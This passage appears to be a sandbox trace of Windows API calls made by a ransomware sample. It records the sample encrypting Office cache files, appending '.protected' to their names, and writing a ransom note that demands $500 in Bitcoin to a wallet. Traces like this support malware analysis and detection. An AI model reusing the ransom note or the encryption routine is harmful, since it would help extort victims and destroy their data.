(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0060.891] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0060.891] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0060.891] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0060.891] CloseHandle (hObject=0xb4) returned 1 [0060.892] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0060.892] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="Windows") returned -1 [0060.892] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="Program Files") returned -1 [0060.892] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="Program Files (x86)") returned -1 [0060.892] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="$Recycle.bin") returned 1 [0060.892] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="System Volume Information") returned -1 [0060.892] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 83 [0060.892] StrStrIW (lpFirst="AccessMUISet.msi", lpSrch=".protected") returned 0x0 [0060.892] lstrcmpW (lpString1="AccessMUISet.msi", lpString2="RESTORE_FILES.txt") returned -1 [0060.892] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0060.892] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0060.892] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0060.892] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 83 [0060.892] StrStrW (lpFirst="AccessMUISet.msi", lpSrch=".txt") returned 0x0 [0060.892] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 83 [0060.892] StrStrW (lpFirst="AccessMUISet.msi", lpSrch=".rar") returned 0x0 [0060.892] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 83 [0060.892] StrStrW (lpFirst="AccessMUISet.msi", lpSrch=".zip") returned 0x0 [0060.892] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0060.916] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.916] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0060.917] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.917] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0060.922] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0060.922] CloseHandle (hObject=0xb4) returned 1 [0060.923] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.protected") returned 93 [0060.923] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.protected")) returned 1 [0060.923] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0060.923] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="Windows") returned -1 [0060.923] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="Program Files") returned -1 [0060.924] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="Program Files (x86)") returned -1 [0060.924] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="$Recycle.bin") returned 1 [0060.924] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="System Volume Information") returned -1 [0060.924] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 83 [0060.924] StrStrIW (lpFirst="AccessMUISet.xml", lpSrch=".protected") returned 0x0 [0060.924] lstrcmpW (lpString1="AccessMUISet.xml", lpString2="RESTORE_FILES.txt") returned -1 [0060.924] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0060.924] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0060.924] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0060.924] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 83 [0060.924] StrStrW (lpFirst="AccessMUISet.xml", lpSrch=".txt") returned 0x0 [0060.924] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 83 [0060.924] StrStrW (lpFirst="AccessMUISet.xml", lpSrch=".rar") returned 0x0 [0060.924] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 83 [0060.924] StrStrW (lpFirst="AccessMUISet.xml", lpSrch=".zip") returned 0x0 [0060.924] ReadFile (in: hFile=0xb4, lpBuffer=0x48ca20, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ca20*, lpNumberOfBytesRead=0x295f174*=0x333, lpOverlapped=0x0) returned 1 [0060.937] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffccd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.938] WriteFile (in: hFile=0xb4, lpBuffer=0x48ca20*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ca20*, lpNumberOfBytesWritten=0x295f174*=0x333, lpOverlapped=0x0) returned 1 [0060.938] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.938] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0060.938] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0060.938] CloseHandle (hObject=0xb4) returned 1 [0060.939] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.protected") returned 93 [0060.939] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.protected")) returned 1 [0060.939] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0060.939] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0060.939] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0060.939] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0060.939] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0060.939] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0060.939] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0060.939] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0060.939] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0060.939] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0060.939] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0060.939] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0060.940] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0060.940] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0060.940] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0060.940] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0060.940] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0060.940] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0060.940] ReadFile (in: hFile=0xb4, lpBuffer=0x48ca20, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ca20*, lpNumberOfBytesRead=0x295f174*=0xa40, lpOverlapped=0x0) returned 1 [0060.946] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff5c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.946] WriteFile (in: hFile=0xb4, lpBuffer=0x48ca20*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ca20*, lpNumberOfBytesWritten=0x295f174*=0xa40, lpOverlapped=0x0) returned 1 [0060.947] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.947] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0060.947] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0060.947] CloseHandle (hObject=0xb4) returned 1 [0060.947] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0060.947] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0060.948] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0060.948] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0060.948] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0060.948] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0060.949] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0060.949] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0060.949] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0060.949] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0060.950] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0060.950] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0060.950] CloseHandle (hObject=0xa4) returned 1 [0060.950] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0060.950] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0060.950] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0060.950] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0060.950] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0060.950] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0060.950] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C") returned 66 [0060.950] lstrcmpW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0060.950] lstrcmpW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0060.950] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*") returned 68 [0060.950] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0061.072] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0061.072] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0061.072] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0061.072] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0061.072] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0061.072] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\.") returned 68 [0061.072] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.072] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0061.072] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0061.072] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.073] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.073] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.073] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.073] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0061.073] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0061.073] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0061.073] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0061.073] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0061.073] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\..") returned 69 [0061.073] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.073] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.073] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0061.073] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0061.073] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.073] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.073] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.073] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0061.073] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Windows") returned -1 [0061.073] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Program Files") returned -1 [0061.073] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Program Files (x86)") returned -1 [0061.073] lstrcmpiW (lpString1="Office32WW.msi", lpString2="$Recycle.bin") returned 1 [0061.073] lstrcmpiW (lpString1="Office32WW.msi", lpString2="System Volume Information") returned -1 [0061.073] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0061.073] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".protected") returned 0x0 [0061.073] lstrcmpW (lpString1="Office32WW.msi", lpString2="RESTORE_FILES.txt") returned -1 [0061.074] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0061.074] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0061.074] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0061.074] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0061.075] StrStrW (lpFirst="Office32WW.msi", lpSrch=".txt") returned 0x0 [0061.075] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0061.075] StrStrW (lpFirst="Office32WW.msi", lpSrch=".rar") returned 0x0 [0061.075] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0061.075] StrStrW (lpFirst="Office32WW.msi", lpSrch=".zip") returned 0x0 [0061.075] ReadFile (in: hFile=0xb4, lpBuffer=0x4adad8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: 